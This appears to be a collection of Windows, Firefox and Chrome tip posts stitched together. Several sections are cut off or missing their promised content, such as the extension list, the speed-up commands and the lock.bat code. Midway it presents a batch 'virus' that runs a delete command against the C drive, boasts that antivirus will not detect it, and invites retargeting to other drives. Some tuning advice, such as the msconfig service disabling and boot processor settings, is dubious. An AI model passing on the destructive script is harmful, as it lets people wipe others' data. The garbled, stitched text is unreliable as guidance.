Hey Guys, it's been a long time since my last post so I decided to write one.
Most of us use Google Chrome as the daily driver for browsing the internet 'coz it's fast and the best thing it supports Extensions! And so it also has a 'Chrome Web Store' to download 'em. [ I know that you all must be knowing all this, it's just to increase the content ; p ]

OK so let's get to the point, Here's the not too huge list of some useful Chrome Extensions that will make you more 'Productive':

Hello everyone, it's been a while since Microsoft released Windows 10. But many of us are still struggling to keep up with the slow speed of Windows 10. So I've bought all the nifty tricks and hacks that would make your Windows 10 PC Blazing Fast! So let's get started.

Speeding up the Boot Time:

One of the major Problem of Windows 10 is it's slow boot. Follow the below instructions to make your PC boot faster.

1. In Cortana search for "MS Config" and open the System Config. app.
2. Now in the General tab select "Selective startup". And only enable "Load system services".
3. Now go to Boot tab and set Timeout to "3 seconds". Then click on "Advance options".
4. In the advanced BOOT options Tick "Number of  processors" and select maximum processors from the drop down list. Do the same with Maximum memory and set it to maximum.
5. Now go to Services tab and select "Hide all Microsoft services" then un-check all the Services except your system drivers (i.e. Display/Graphic Drivers).
6. Now go to Startup tab and click "Open Task Manager". In the Task Manager windows Disable all programs except your Drivers. And close Task Manager.
7. Now Click OK. It will ask you for a Restart so do it.

Cleaning Things Up:

All the trash present in your system also makes your system slow. Here's how to clean it up.

1. Uninstall each and every unnecessary application.
2. Clean up trash files using Disk Cleanup Utility. (Don't select Thumbnails in the Cleanup list or all the folder thumbnails will be deleted yet they'll come back soon if you deleted 'em)
   
   
3. Defrag your Hard Drives Regularly.
4. Make sure to empty your Recycle Bin.

Speed Up Commands:

These will help you speed up your PC on the go.

Hello everyone, in this post I will tell you how to enable "slide to shutdown" a hidden feature in windows 8.1 which you may not be knowing. Well actually "slide to shutdown" allows you to shutdown your PC in the same way you unlock your PC.

Just follow the below steps to enable it: 

1. Open File Explorer and go to - (C:\\Windows\System32\)
2. In the folder find "slidetoshutdown.exe" 

    

    3. Now this what you actually want, now just create a shortcut or pin it somewhere you             can access it easily.

Hey, friends today I will show you how to solve the problem that sometimes Pen drives show empty folder.
Follow these steps to solve the problem:

1. Click on "Start" --> In search box, type cmd and press "Enter". 
2. "Command Prompt" will be opened. 
3. Here I assume your pen drive letter as G: 
4. Enter this command. 
5. attrib -h -r -s /s /d g:\*.* 
6. [You can copy the above command --> Right-click in the Command Prompt and paste it.] 
7. Note : Don't forget to replace the letter g with your pen drive letter. 
8. Now press "Enter". 

Now check for your files in your pen drive.

In this post I will tell how to make a invisible folder in windows. Follow Steps to create your own:

• Create a New Folder.
• Right click on it and go to Properties.
• In the Customize tab click Change Icon.
• Find a blank icon and click OK.                                          
  

• Now, in the Start menu find Character Map.
• Next, find a blank box.

• Click Select and Copy.
• Now right click on the folder andRename.
• Now press Ctrl + V  and hit  Enter.
• You are all done. Enjoy!

What this virus will do:

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

   1. Open Notepad and copy below code into it.

      Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Note: Change 'C' to any other drive name which you want to delete.

In this post i will tell you how to manually update your computer hardware drivers (Only in Windows),
Just follow these Steps:

1. Right click on My Computer. Select Manage.
2. A window will open. On the left panel click on Device Manager.
3. Now a list of hardware s will appear.
4. Right click on the hardware name and select Update Driver Software...  
5. A window will appear, Select Search automatically for updated driver software (Internet Connection is required)
6. Now the computer will search for the update and install if available. Enjoy!!! 

Reduce the amount of RAM Firefox uses for it’s cache feature

Here’s how to do it:
1. Type “about:config” (no quotes) in the adress bar in the browser.
2. Find “browser.sessionhistory.max_total_viewer”
3. Set it’s value to “0“;(Zero)

Increase the Speed in Which Firefox loads pages

1. Type “about:config” into the address bar and hit Enter.
(Normally the browser will make one request to a web page at a time. When you enable pipeliningit will make several at once, which really speeds up page loading.)

2. Alter the entries as follows:
Set “network.http.pipelining” to “true”
Set “network.http.proxy.pipelining” to “true”
Set “network.http.pipelining.maxrequests” to some number like 10.

This means it will make 10 requests at once.

3. Lastly, right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0“;.(Zero)

This value is the amount of time the browser waits before it acts on information it receives. If you’re using a broadband connection you’ll load pages faster now.
Optionally (for even faster web browsing) here are some more options for your about:config (you might have to create some of these entries by Right Click –> New– > Interger or String

network.dns.disableIPv6: set “false” 
“content.notify.backoffcount”: set “5“; (Five)
“plugin.expose_full_path”: set “true”.
“ui.submenuDelay”: set “0; (zero)

Reduce RAM usage to 10mb when Firefox is minimized:

This little hack will drop Firefox’s RAM usage down to 10 Mb when minimized:

1. Open Firefox and go to the Address Bar. Type in about:config and then press Enter.
2. Right Click in the page and select New -> Boolean.
3. In the box that pops up enter “config.trim_on_minimize”. Press Enter.
4. Now select True and then press Enter.
5. Restart Firefox.

   2. Save the notepad file as lock.bat (.bat is must)

   3. Now double click on lock.bat and a new folder will be created with name MyFolder

   4. Copy all your data you want to protect in that New folder

   5. Now double click on lock.bat and when command promp appears Type Y and press enter.

   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat

   7. It will ask for password enter your password and done. (Default password is toolcube)

1. Click on the File you'v downloaded from below.
2. Now Command Prompt will start. 
3. Now, type the IP Address next to User: of the computer you want to contact and press Enter.
4. Now all you need to do is type your message and press Enter. Start Chatting.......!
